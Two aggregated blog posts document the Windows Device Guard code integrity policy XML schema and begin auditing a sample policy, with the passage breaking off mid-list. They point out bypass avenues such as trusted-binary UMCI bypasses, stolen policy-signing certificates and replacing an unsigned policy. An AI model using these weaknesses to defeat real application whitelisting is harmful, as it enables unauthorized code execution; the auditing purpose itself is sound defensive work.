Quantcast
Channel: Exploit Monday
Viewing all 78 articles
Browse latest View live

Windows Device Guard Code Integrity Policy Reference

$
0
0
One of the more obvious ways to circumvent Device Guard deployments is by exploiting code integrity policy misconfigurations. The ability to effectively audit deployed policies requires a thorough comprehension of the XML schema used by Device Guard. This post is intended to serve as documentation of the XML elements of a Device Guard code integrity policy with a focus on auditing from the perspective of a pentester. And do note that the schema used by Microsoft is not publicly documented and subject to change in future versions. If things change, expect an update from me.
As a reminder, deployed code integrity policies are stored in %SystemRoot%\System32\CodeIntegrity\SIPolicy.p7b in binary form. If you're lucky enough to track down the original XML code integrity policy, you can validate that it matches the deployed SIPolicy.p7b by converting it to binary form with ConvertFrom-CIPolicy and then comparing the hashes with Get-FileHash. If you are unable to locate the original XML policy, you can recover an XML policy with the ConvertTo-CIPolicy function I wrote. Note, however that ConvertTo-CIPolicy cannot recover all element ID and FriendlyName attributes as the process of converting to binary form is a lossy process, unfortunately.
For reference, here are some code integrity policies that I personally use. Obviously, yours will be different in your environment.
Policies are generated initially using the New-CiPolicy cmdlet.
The current (but subject to change) code integrity schema can be found here. This was pulled out from an embedded resource in the ConfigCI cmdlets - Microsoft.ConfigCI.Commands.dll.
What will follow is a detailed breakdown of most code integrity policy XML elements that you may encounter while auditing Device Guard deployments. Hopefully, at some point in the future, Microsoft will provide such documentation. In the mean time, I hope this is helpful! In a future post, I will conduct an actual code integrity policy audit and identify potential vulnerabilities that would allow for unsigned code execution.

VersionEx
Default value: 10.0.0.0
Purpose: An admin can set this to perform versioning of updated CI policies. This is what I do in BypassDenyPolicy.xml. VersionEx can be set programmatically with Set-CIPolicyVersion.

PolicyTypeID

Default value: {A244370E-44C9-4C06-B551-F6016E563076}
Purpose: Unknown. This value is automatically generated upon calling New-CIPolicy. Unless Microsoft decides to change things, this value should always remain the same.

PlatformID
Default value: {2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}
Purpose: Unknown. This value is automatically generated upon calling New-CIPolicy. Unless Microsoft decides to change things, this value should always remain the same.

Rules

The Rules element consist of multiple child Rule elements. A Rule element refers to a specific policy rule option - i.e. a specific configuration of Device Guard. Some, but not all of these options are documented. Policy rule options are configured with the Set-RuleOption cmdlet.

Documented and/or publicly exposed policy rules

1) Enabled:UMCI
Description: Enforces user-mode code integrity for user mode binaries, PowerShell scripts, WSH scripts, and MSIs. The absence of this policy rule implies that whitelist/blacklist rules will only apply to drivers.
Operational impact: User mode binaries and MSIs not explicitly whitelisted will not execute. PowerShell will be placed into ConstrainedLanguage mode. Whitelisted, signed scripts have no restrictions and run in FullLanguage mode. WSH scripts (VBScript and JScript) not whitelisted per policy are unable to instantiate COM/ActiveX objects. Signed scripts whitelisted by policy have no such restrictions.
2) Required:WHQL
Description: Drivers must be Windows Hardware Quality Labs (WHQL) signed. Drivers signed with a WHQL certificate are indicated by a "Windows Hardware Driver Verification" EKU (1.3.6.1.4.1.311.10.3.5) in their certificate.
Operational impact: This will raise the bar on the quality (and arguably the trustworthiness) of the drivers that will be allowed to execute.
3) Disabled:Flight Signing
Description: Disable loading of flight signed code. These are used most commonly with Insider Preview builds of Windows. A flight signed binary/script is one that is signed by a Microsoft certificate and has the "Preview Build Signing" EKU (1.3.6.1.4.1.311.10.3.27) applied. Thanks to Alex Ionescu for confirming this.
Operational Impact: Preview build binaries/scripts will not be allowed to load. In other words, if you're on a WIP build, don't expect your OS to function properly.
4) Enabled:Unsigned System Integrity Policy
Description: If present, the code integrity policy does not have to be signed with a code signing certificate. The absence of this rule option indicates that the code integrity policy must be signed by a whitelisted signer as indicated in the UpdatePolicySigners section below.
Operational Impact: Once signed, deployed code integrity options can only be updated by signing a new policy with a whitelisted certificate. Even an admin cannot remove deployed, signed code integrity policies. If modifying and redeploying a signed code integrity policy is your goal, you will need to steal one of the whitelisted UpdatePolicySigners code signing certificates.
5) Required:EV Signers
Description: All drivers must be EV (extended validation) signed.
Operational Impact: This will likely not be present as most 3rd party and OEM drivers are not EV signed. Supposedly, Microsoft is mandating that all drivers be EV signed starting with Windows 10 Anniversary Update. From my observation, this does not appear to be the case.
6) Enabled:Advanced Boot Options Menu
Description: By default, with a code integrity policy deployed, the advanced boot options menu is disabled.
Operational Impact: With this option present, the menu is available to someone with physical access. There are additional concerns associated with physical access to a Device Guard enabled system. Such concerns may be covered in a future blog post.
7) Enabled:Boot Audit On Failure
Description: If a driver fails to load during the boot process due to an overly restrictive code integrity policy, the system will be placed into audit mode for that session.
Operational Impact: If you could somehow get a driver to fail to load during the boot process, Device Guard would cease to be enforced.
8) Disabled:Script Enforcement
Description: This is not actually documented but listed with 'Set-RuleOption -Help'. You would think that this actually does what it says but in practice it doesn't. Even with this set, PowerShell and WSH remain locked down.
Operational Impact: None. It is unlikely that you would see this in production anyway.

Undocumented and/or not not publicly exposed policy rules

The following policy rule options are undocumented and it is unclear if they are supported or not. As of this writing, you will likely never see these options in a deployed policy.
  • Enabled:Boot Menu Protection
  • Enabled:Inherit Default Policy
  • Allowed:Prerelease Signers
  • Allowed:Kits Signers
  • Allowed:Debug Policy Augmented
  • Allowed:UMCI Debug Options
  • Enabled:UMCI Cache Data Volumes
  • Allowed:SeQuerySigningPolicy Extension
  • Enabled:Filter Edited Boot Options
  • Disabled:UMCI USN 0 Protection
  • Disabled:Winload Debugging Mode Menu
  • Enabled:Strong Crypto For Code Integrity
  • Allowed:Non-Microsoft UEFI Applications For BitLocker
  • Enabled:Always Use Policy
  • Enabled:UMCI Trust USN 0
  • Disabled:UMCI Debug Options TCB Lowering
  • Enabled:Inherit Default Policy
  • Enabled:Secure Setting Policy


EKUs
This can consist of a list of Extended/Enhanced Key usages that can be applied to signers. When applied to a signer rule, the EKU in the certificate must be present in the certificate used to sign the binary/script.
EKU instances have a "Value" attribute consisting of an encoded OID. For example, if you want to enforce WHQL signing, the "Windows Hardware Driver Verification" EKU (1.3.6.1.4.1.311.10.3.5) would need to be applied to those drivers. When encoded the "Value" attribute would be "010A2B0601040182370A0305" (where the first byte which would normally be 0x06 (absolute OID) is replaced with 0x01). The OID encoding process is described here. ConvertTo-CIPolicy decodes and resolves the original FriendlyName attribute for encoded OID values.

FileRules
These are rules specific to individual files based either on its hash or based on its filename (not on disk but from the embedded PE resource) and file version (again, from the embedded PE resource). FileRules can consist of the following types: FileAttrib, Allow, Deny. File rules can apply to specific signers or signing scenarios.
FileAttrib
These are used to reflect a user or kernel PE filename and minimum file version number. These can be used to either explicitly allow or block binaries based on filename and version.
Allow
These typically consist of just a file hash and is used to override an explicit deny rule. In practice, it is unlikely that you will see an Allow file rule.
Deny
These typically consist of just a file hash and are used to override whitelist rules when you want to block trusted code by hash.

Signers
This section consists of all of the signing certificates that will be applied to rules in the signing scenario section. Each signer entry is required to have a CertRoot property where the Value attribute refers to the hash of the cbData blob of the certificate. The hashing algorithm used is dependent upon the hashing algorithm specified in the certificate. This hash serves as the unique identifier for the certificate. The CertRoot "Type" attribute will almost always be "TBS" (to be signed). The "WellKnown" type is also possible but will not be common.
The signer element can have any of the following optional child elements:
CertEKU
One or more EKUs from the EKU element described above can be applied here. Ultimately, this would constrain a whitelist rule to code signed with certificates with specific EKUs, "Windows Hardware Driver Verification" (WHQL) probably being the most common.
CertIssuer
I have personally not seen this in practice but this will likely contain the common name (CN) of the issuing certificate.
CertPublisher
This refers to the common name (CN) of the certificate. This element is associated with the "Publisher" file rule level.
CertOemID
This is often associated with driver signers. This will often have a third party vendor name associated with a driver signed with a "Microsoft Windows Third Party Component CA" certificate. If CertOemIDs were not specified for the "Microsoft Windows Third Party Component CA" signer, then you would implicitly be whitelisting all 3rd party drivers signed by Microsoft.
FileAttribRef
There may be one or more references to FileAttrib rules where the signer rules apply only to the files referenced.

SigningScenarios
When auditing Code Integrity policies, this is where you will want to start your audit and then work backwards. It contains all the enforcement rules for drivers and user mode code. Signing scenarios consist of a combination of the individual elements discussed previously. There will almost always be two Signing scenario elements present:
  1. <SigningScenario Value="131" ID="ID_SIGNINGSCENARIO_DRIVERS_1"> - This scenario will consist of zero or more rules related to driver loading.
  2. <SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS"> - This scenario will consist of zero or more rules related to user mode binaries, scripts, and MSIs.

Each signing scenario can have up to three subelements:
  1. ProductSigners - This will comprise all of the code integrity rules for drivers or user mode code depending upon the signing scenario.
  2. TestSigners - You will likely never encounter this. The purpose of this signing scenario is unclear.
  3. TestSigningSigners - You will likely never encounter this. The purpose of this signing scenario is unclear.

Each signers group (ProductSigners, TestSigners, or TestSigningSigners) may consist of any of the following subelements:
Allowed signers
These are the whitelisted signer rules. These will consist of one or more signer rules and optionally, one or more ExceptDenyRules which link to specific file rules making the signer rule conditional. In practice, ExceptDenyRules will likely not be present.
Denied signers
These are the blacklisted signer rules. These rules will always take priority over allow rules. These will consist of one or more signer rules and optionally, one or more ExceptAllowRules which link to specific file rules making the signer rule conditional. In practice, ExceptAllowRules will likely not be present.
FileRulesRef
These will consist of individual file allow or deny rules. For example, if there are individual files to be blocked by hash, such rules will be included here.

UpdatePolicySigners
If policy signing is required as indicated by the absence of the "Enabled:Unsigned System Integrity Policy" policy rule option, a deployed policy must be signed by the signers indicated here. The only way to modify a deployed policy in this case would be to resign the policy with one of these certificates. UpdatePolicySigners is updated using the Add-SignerRule cmdlet.
If a binary policy (SIPolicy.p7b) is signed, you can validate signature with Get-CIBinaryPolicyCertificate.

CISigners
These will consist of mirrored signing rules from the ID_SIGNINGSCENARIO_WINDOWS signing scenario. These are related to the trusting of signers and signing levels by the kernel. These are auto-generated and not configurable via the ConfigCI PowerShell module. These entries should not be modified.

HvciOptions
This specifies the configured hypervisor code integrity (HVCI) option. HVCI implements several kernel exploitation mitigations including W^X kernel memory and restricts the ability to allocate any executable memory for code that isn't explicitly whitelisted. Basically, HVCI allows for the system to continue to enforce code integrity even if the kernel is compromised. HVCI settings are configured using the Set-HVCIOptions cmdlet.
Any combination of the following values are accepted:
0 - Non configured
1 - Enabled
2 - Strict mode
4 - Debug mode
HVCI is not well documented as of this writing. Here are a few references to it:
Outside of Microsoft, Alex Ionescu and Rafal Wojtczuk are experts on this subject.

Settings
Settings may consist of one or more provider/value pairs. These options are referred to internally as  "Secure Settings". It is unclear the range of possible values that can be set here. The only entry you might see would be a PolicyInfo provider setting where a user can specify an explicit Name and Id for the code integrity policy which would be reflected in Microsoft-Windows-CodeIntegrity/Operational events. PolicyInfo settings can be set with the Set-CIPolicyIdInfo cmdlet.

Device Guard Code Integrity Policy Auditing Methodology

$
0
0
In my previous blogpost, I provided a detailed reference of every component of a code integrity (CI) policy. In this post, I'd like to exercise that reference and perform an audit of a code integrity policy. We're going to analyze a policy that I had previously deployed to my Surface Pro 4 - final.xml.

<?xmlversion="1.0"encoding="utf-8"?>
<SiPolicyxmlns="urn:schemas-microsoft-com:sipolicy">
  <VersionEx>10.0.0.0</VersionEx>
  <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
  <Rules>
    <Rule>
      <Option>Required:Enforce Store Applications</Option>
    </Rule>
    <Rule>
      <Option>Enabled:UMCI</Option>
    </Rule>
    <Rule>
      <Option>Disabled:Flight Signing</Option>
    </Rule>
    <Rule>
      <Option>Required:WHQL</Option>
    </Rule>
    <Rule>
      <Option>Enabled:Unsigned System Integrity Policy</Option>
    </Rule>
    <Rule>
      <Option>Enabled:Advanced Boot Options Menu</Option>
    </Rule>
  </Rules>
  <!--EKUS-->
  <EKUs/>
  <!--File Rules-->
  <FileRules>
    <FileAttribID="ID_FILEATTRIB_F_1_0_0_1_0_0"FriendlyName="cdb.exe"FileName="CDB.Exe"MinimumFileVersion="99.0.0.0"/>
    <FileAttribID="ID_FILEATTRIB_F_2_0_0_1_0_0"FriendlyName="kd.exe"FileName="kd.exe"MinimumFileVersion="99.0.0.0"/>
    <FileAttribID="ID_FILEATTRIB_F_3_0_0_1_0_0"FriendlyName="windbg.exe"FileName="windbg.exe"MinimumFileVersion="99.0.0.0"/>
    <FileAttribID="ID_FILEATTRIB_F_4_0_0_1_0_0"FriendlyName="MSBuild.exe"FileName="MSBuild.exe"MinimumFileVersion="99.0.0.0"/>
    <FileAttribID="ID_FILEATTRIB_F_5_0_0_1_0_0"FriendlyName="csi.exe"FileName="csi.exe"MinimumFileVersion="99.0.0.0"/>
  </FileRules>
  <!--Signers-->
  <Signers>
    <SignerID="ID_SIGNER_S_1_0_0_0_0_0_0_0"Name="Microsoft Windows Production PCA 2011">
      <CertRootType="TBS"Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146"/>
    </Signer>
    <SignerID="ID_SIGNER_S_AE_0_0_0_0_0_0_0"Name="Intel External Basic Policy CA">
      <CertRootType="TBS"Value="53B052BA209C525233293274854B264BC0F68B73"/>
    </Signer>
    <SignerID="ID_SIGNER_S_AF_0_0_0_0_0_0_0"Name="Microsoft Windows Third Party Component CA 2012">
      <CertRootType="TBS"Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46"/>
    </Signer>
    <SignerID="ID_SIGNER_S_17C_0_0_0_0_0_0_0"Name="COMODO RSA Certification Authority">
      <CertRootType="TBS"Value="7CE102D63C57CB48F80A65D1A5E9B350A7A618482AA5A36775323CA933DDFCB00DEF83796A6340DEC5EBF7596CFD8E5D"/>
    </Signer>
    <SignerID="ID_SIGNER_S_18D_0_0_0_0_0_0_0"Name="Microsoft Code Signing PCA 2010">
      <CertRootType="TBS"Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195"/>
    </Signer>
    <SignerID="ID_SIGNER_S_2E0_0_0_0_0_0_0_0"Name="VeriSign Class 3 Code Signing 2010 CA">
      <CertRootType="TBS"Value="4843A82ED3B1F2BFBEE9671960E1940C942F688D"/>
    </Signer>
    <SignerID="ID_SIGNER_S_34C_0_0_0_0_0_0_0"Name="Microsoft Code Signing PCA">
      <CertRootType="TBS"Value="27543A3F7612DE2261C7228321722402F63A07DE"/>
    </Signer>
    <SignerID="ID_SIGNER_S_34F_0_0_0_0_0_0_0"Name="Microsoft Code Signing PCA 2011">
      <CertRootType="TBS"Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E"/>
    </Signer>
    <SignerID="ID_SIGNER_S_37B_0_0_0_0_0_0_0"Name="Microsoft Root Certificate Authority">
      <CertRootType="TBS"Value="391BE92883D52509155BFEAE27B9BD340170B76B"/>
    </Signer>
    <SignerID="ID_SIGNER_S_485_0_0_0_0_0_0_0"Name="Microsoft Windows Verification PCA">
      <CertRootType="TBS"Value="265E5C02BDC19AA5394C2C3041FC2BD59774F918"/>
    </Signer>
    <SignerID="ID_SIGNER_S_1_1_0_0_0_0_0_0"Name="Microsoft Windows Production PCA 2011">
      <CertRootType="TBS"Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146"/>
    </Signer>
    <SignerID="ID_SIGNER_S_35C_1_0_0_0_0_0_0"Name="Microsoft Code Signing PCA">
      <CertRootType="TBS"Value="27543A3F7612DE2261C7228321722402F63A07DE"/>
    </Signer>
    <SignerID="ID_SIGNER_S_35F_1_0_0_0_0_0_0"Name="Microsoft Code Signing PCA 2011">
      <CertRootType="TBS"Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E"/>
    </Signer>
    <SignerID="ID_SIGNER_S_1EA5_1_0_0_0_0_0_0"Name="Microsoft Code Signing PCA 2010">
      <CertRootType="TBS"Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195"/>
    </Signer>
    <SignerID="ID_SIGNER_S_2316_1_0_0_0_0_0_0"Name="Microsoft Windows Verification PCA">
      <CertRootType="TBS"Value="265E5C02BDC19AA5394C2C3041FC2BD59774F918"/>
    </Signer>
    <SignerID="ID_SIGNER_S_3D8C_1_0_0_0_0_0_0"Name="Microsoft Code Signing PCA">
      <CertRootType="TBS"Value="7251ADC0F732CF409EE462E335BB99544F2DD40F"/>
    </Signer>
    <SignerID="ID_SIGNER_S_4_1_0_0_0"Name="Matthew Graeber">
      <CertRootType="TBS"Value="B1554C5EEF15063880BB76B347F2215CDB5BBEFA1A0EBD8D8F216B6B93E8906A"/>
    </Signer>
    <SignerID="ID_SIGNER_S_1_1_0"Name="Intel External Basic Policy CA">
      <CertRootType="TBS"Value="53B052BA209C525233293274854B264BC0F68B73"/>
      <CertPublisherValue="Intel(R) Intel_ICG"/>
    </Signer>
    <SignerID="ID_SIGNER_S_2_1_0"Name="Microsoft Windows Third Party Component CA 2012">
      <CertRootType="TBS"Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46"/>
      <CertPublisherValue="Microsoft Windows Hardware Compatibility Publisher"/>
    </Signer>
    <SignerID="ID_SIGNER_S_19_1_0"Name="Intel External Basic Policy CA">
      <CertRootType="TBS"Value="53B052BA209C525233293274854B264BC0F68B73"/>
      <CertPublisherValue="Intel(R) pGFX"/>
    </Signer>
    <SignerID="ID_SIGNER_S_20_1_0"Name="iKGF_AZSKGFDCS">
      <CertRootType="TBS"Value="32656594870EFFE75251652A99B906EDB92D6BB0"/>
      <CertPublisherValue="IntelVPGSigning2016"/>
    </Signer>
    <SignerID="ID_SIGNER_S_4E_1_0"Name="Microsoft Windows Third Party Component CA 2012">
      <CertRootType="TBS"Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46"/>
    </Signer>
    <SignerID="ID_SIGNER_S_65_1_0"Name="VeriSign Class 3 Code Signing 2010 CA">
      <CertRootType="TBS"Value="4843A82ED3B1F2BFBEE9671960E1940C942F688D"/>
      <CertPublisherValue="Logitech"/>
    </Signer>
    <SignerID="ID_SIGNER_S_5_1_0_0_0"Name="Matthew Graeber">
      <CertRootType="TBS"Value="B1554C5EEF15063880BB76B347F2215CDB5BBEFA1A0EBD8D8F216B6B93E8906A"/>
    </Signer>
    <SignerID="ID_SIGNER_F_1_0_0_1_0_0"Name="Microsoft Code Signing PCA">
      <CertRootType="TBS"Value="27543A3F7612DE2261C7228321722402F63A07DE"/>
      <CertPublisherValue="Microsoft Corporation"/>
      <FileAttribRefRuleID="ID_FILEATTRIB_F_1_0_0_1_0_0"/>
      <FileAttribRefRuleID="ID_FILEATTRIB_F_2_0_0_1_0_0"/>
      <FileAttribRefRuleID="ID_FILEATTRIB_F_3_0_0_1_0_0"/>
      <FileAttribRefRuleID="ID_FILEATTRIB_F_4_0_0_1_0_0"/>
    </Signer>
    <SignerID="ID_SIGNER_F_2_0_0_1_0_0"Name="Microsoft Code Signing PCA 2010">
      <CertRootType="TBS"Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195"/>
      <CertPublisherValue="Microsoft Corporation"/>
      <FileAttribRefRuleID="ID_FILEATTRIB_F_1_0_0_1_0_0"/>
      <FileAttribRefRuleID="ID_FILEATTRIB_F_2_0_0_1_0_0"/>
      <FileAttribRefRuleID="ID_FILEATTRIB_F_3_0_0_1_0_0"/>
    </Signer>
    <SignerID="ID_SIGNER_F_3_0_0_1_0_0"Name="Microsoft Code Signing PCA 2011">
      <CertRootType="TBS"Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E"/>
      <CertPublisherValue="Microsoft Corporation"/>
      <FileAttribRefRuleID="ID_FILEATTRIB_F_4_0_0_1_0_0"/>
      <FileAttribRefRuleID="ID_FILEATTRIB_F_5_0_0_1_0_0"/>
    </Signer>
    <SignerID="ID_SIGNER_F_4_0_0_1_0_0"Name="Microsoft Windows Production PCA 2011">
      <CertRootType="TBS"Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146"/>
      <CertPublisherValue="Microsoft Windows"/>
      <FileAttribRefRuleID="ID_FILEATTRIB_F_4_0_0_1_0_0"/>
    </Signer>
  </Signers>
  <!--Driver Signing Scenarios-->
  <SigningScenarios>
    <SigningScenarioValue="131"ID="ID_SIGNINGSCENARIO_DRIVERS_1"FriendlyName="Kernel-mode rules">
      <ProductSigners>
        <AllowedSigners>
          <AllowedSignerSignerId="ID_SIGNER_S_1_0_0_0_0_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_AE_0_0_0_0_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_AF_0_0_0_0_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_17C_0_0_0_0_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_18D_0_0_0_0_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_2E0_0_0_0_0_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_34C_0_0_0_0_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_34F_0_0_0_0_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_37B_0_0_0_0_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_485_0_0_0_0_0_0_0"/>
        </AllowedSigners>
      </ProductSigners>
    </SigningScenario>
    <SigningScenarioValue="12"ID="ID_SIGNINGSCENARIO_WINDOWS"FriendlyName="User-mode rules">
      <ProductSigners>
        <AllowedSigners>
          <AllowedSignerSignerId="ID_SIGNER_S_1_1_0_0_0_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_1_1_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_2_1_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_4_1_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_19_1_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_20_1_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_4E_1_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_65_1_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_35C_1_0_0_0_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_35F_1_0_0_0_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_1EA5_1_0_0_0_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_2316_1_0_0_0_0_0_0"/>
          <AllowedSignerSignerId="ID_SIGNER_S_3D8C_1_0_0_0_0_0_0"/>
        </AllowedSigners>
        <DeniedSigners>
          <DeniedSignerSignerId="ID_SIGNER_F_1_0_0_1_0_0"/>
          <DeniedSignerSignerId="ID_SIGNER_F_2_0_0_1_0_0"/>
          <DeniedSignerSignerId="ID_SIGNER_F_3_0_0_1_0_0"/>
          <DeniedSignerSignerId="ID_SIGNER_F_4_0_0_1_0_0"/>
        </DeniedSigners>
      </ProductSigners>
    </SigningScenario>
  </SigningScenarios>
  <UpdatePolicySigners>
    <UpdatePolicySignerSignerId="ID_SIGNER_S_5_1_0_0_0"/>
  </UpdatePolicySigners>
  <CiSigners>
    <CiSignerSignerId="ID_SIGNER_F_1_0_0_1_0_0"/>
    <CiSignerSignerId="ID_SIGNER_F_2_0_0_1_0_0"/>
    <CiSignerSignerId="ID_SIGNER_F_3_0_0_1_0_0"/>
    <CiSignerSignerId="ID_SIGNER_F_4_0_0_1_0_0"/>
    <CiSignerSignerId="ID_SIGNER_S_1_1_0"/>
    <CiSignerSignerId="ID_SIGNER_S_1_1_0_0_0_0_0_0"/>
    <CiSignerSignerId="ID_SIGNER_S_2_1_0"/>
    <CiSignerSignerId="ID_SIGNER_S_4_1_0_0_0"/>
    <CiSignerSignerId="ID_SIGNER_S_19_1_0"/>
    <CiSignerSignerId="ID_SIGNER_S_20_1_0"/>
    <CiSignerSignerId="ID_SIGNER_S_4E_1_0"/>
    <CiSignerSignerId="ID_SIGNER_S_65_1_0"/>
    <CiSignerSignerId="ID_SIGNER_S_35C_1_0_0_0_0_0_0"/>
    <CiSignerSignerId="ID_SIGNER_S_35F_1_0_0_0_0_0_0"/>
    <CiSignerSignerId="ID_SIGNER_S_1EA5_1_0_0_0_0_0_0"/>
    <CiSignerSignerId="ID_SIGNER_S_2316_1_0_0_0_0_0_0"/>
    <CiSignerSignerId="ID_SIGNER_S_3D8C_1_0_0_0_0_0_0"/>
  </CiSigners>
  <HvciOptions>1</HvciOptions>
</SiPolicy>

A code integrity policy is only as good as the way in which it was configured. The only way to verify its effectiveness is with a thorough understanding of the policy schema and the intended deployment scenario of the policy all through the lens of an attacker. The analysis that I present, while subjective, will be thorough and well thought out based on the information I've learned about code integrity policy enforcement. The extent of my knowledge is driven by my experience with Device Guard thus far, Microsoft's public documentation, the talks I've had with the Device Guard team, and what I've reversed engineered.

Hopefully, you'll have the luxury of being able to analyze an orignal CI policy containing all comments and attributes. In some situations, you may not be so lucky and may be forced to obtain an XML policy from a deployed binary policy - SIPolicy.p7b. Comments and some attribtues are stripped from binary policies. CI policy XML can be recovered with ConvertTo-CiPolicy.

Alright. Let's dive into the analysis now. When I audit a code integrity policy, I will start in the following order:
  1. Policy rule analysis
  2. SigningScenario analysis. Signing scenario rules are ultimately generated based on a combination of one or more file rule levels.
  3. UpdatePolicySigner analysis
  4. HvciOptions analysis

Policy Rule Analysis
Policy rules dictate the overall configuration of Device Guard. What will follow is a description of each rule and its implications.

1) Required:Enforce Store Applications

Description: The presence of this setting indicates that code integrity will also be applied to Windows Store/UWP apps.

Implications: It is unlikely that the absence of this rule would lead to a code integrity bypass scenario but in the off-chance an attacker attempted to deploy an unsigned UWP application, Device Guard would prevent it from loading. The actual implementation of this rule is unclear to me and warrants research. For example, if you launch modern calc (Calculator.exe), it is not actually signed. There’s obviously some other layer of enforcement occurring that I don’t currently comprehend.

Note: This rule option is not actually officially documented but it is accessible the Set-RuleOption cmdlet.

2) Enabled:UMCI

Description: The presence of this setting indicates that user mode code integrity is to be enforced. This means that all user-mode code (exe, dll, msi, js, vbs, PowerShell) is subject to enforcement. Compiled binaries (e.g. exe, dll, msi) not conformant to policy will outright fail to load. WSH scripts (JS and VBScript) not conformant to policy will be prevented from instantiating COM objects, and PowerShell scripts/modules not conformant to policy will be placed into Constrained Language mode. The absence of this rule implies that the code integrity policy will only apply to drivers.

Implications: Attackers will need to come armed with UMCI bpasses to circumvent this protection. Myself, along with Casey Smith (@subtee) and Matt Nelson (@enigma0x3) have been doing a lot of research lately in developing UMCI bypasses. To date, we’ve discussed some of these bypasses publicly. As of this writing, we also have several open cases with MSRC addressing many more UMCI issues. Our research has focused on discovering trusted binaries that allow us to execute unsigned code, Device Guard implementation flaws, and PowerShell Constrained Language mode bypasses. We hope to see fixes implemented for all the issues we reported.

Attackers seeking to circumvent Device Guard should be aware of UMCI bypasses as this is often the easiest way to circumvent a Device Guard deployment.

3) Required:WHQL

Description: All drivers must be WHQL signed as indicated by a "Windows Hardware Driver Verification" EKU (1.3.6.1.4.1.311.10.3.5) in their certificate.

Implications: This setting raises the bar for trust and integrity of the drivers that are allowed to load.

4) Disabled:Flight Signing

Description: Flight signed code will be prevented from loading. This should only affect the loading of Windows Insider Preview code.

Implications: It is recommended that this setting be enabled. This will preclude you from running Insider Preview builds, however. Flight signed code does not go through the rigorous testing that code for a general availability release would go through (I say so speculatively).

5) Enabled:Unsigned System Integrity Policy

Description: This setting indicates that Device Guard does not require that the code integrity policy be signed. Code Integrity policy signing is a very effective mitigation against CI policy tampering as it makes it so that only code signing certificates included in the UpdatePolicySigners section are authorized to make CI policy changes.

Implications: An attacker would need to steal one of the approved code signing certificates to make changes therefore, it is critical that that these code signing certificates be well protected. It should go without saying that the certificate used to sign a policy not be present on a system where the code integrity policy is deployed. More generally, no code signing certificates should be present on any Device Guard protected system that are whitelisted per policy.

6) Enabled:Advanced Boot Options Menu

Description: By default, with a code integrity policy deployed, the advanced boot options menu is disabled. The presence of this rule indicates that a user with physical access can access the menu.

Implications: An attacker with physical access will have the ability to remove deployed code integrity policies. If this is a realistic threat for you, then it is critical that BitLocker be deployed and a UEFI password be set. Additionally, since the “Enabled:Unsigned System Integrity Policy” option is set, an attacker could simply replace the existing, deployed code integrity policy with that of their own which permits their their code to execute.

Analysis/recommendations: Policy Rules


After thorough testing had been performed, it would be recommended to
  1. Remove "Enabled:Unsigned System Integrity Policy" and to sign the policy. This is an extremely effective way to prevent policy tampering.
  2. Remove "Enabled:Advanced Boot Options Menu". This is an effective mitigation against certain physical attacks.
  3. If possible, enable "Required:EV Signers". This is likely not possible however since it is likely that all required drivers will not be EV signed.

SigningScenario analysis

At this point, we’re interested in identifying what is whitelisted and what is blacklisted. The most efficient place to start is by analyzing the SigningScenarios section and working our way backwards.

There will only ever be at most two SigningScenarios:

  • ID_SIGNINGSCENARIO_DRIVERS_1 - these rules only apply to drivers
  • ID_SIGNINGSCENARIO_WINDOWS - these rules only apply to user mode code

ID_SIGNINGSCENARIO_DRIVERS_1


The following driver signers are whitelisted:

- ID_SIGNER_S_1_0_0_0_0_0_0_0
  Name: Microsoft Windows Production PCA 2011
  TBS: 4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146
- ID_SIGNER_S_AE_0_0_0_0_0_0_0
  Name: Intel External Basic Policy CA
  TBS: 53B052BA209C525233293274854B264BC0F68B73
- ID_SIGNER_S_AF_0_0_0_0_0_0_0
  Name: Microsoft Windows Third Party Component CA 2012
  TBS: CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46
- ID_SIGNER_S_17C_0_0_0_0_0_0_0
  Name: COMODO RSA Certification Authority
  TBS: 7CE102D63C57CB48F80A65D1A5E9B350A7A618482AA5A36775323CA933DDFCB00DEF83796A6340DEC5EBF7596CFD8E5D
- ID_SIGNER_S_18D_0_0_0_0_0_0_0
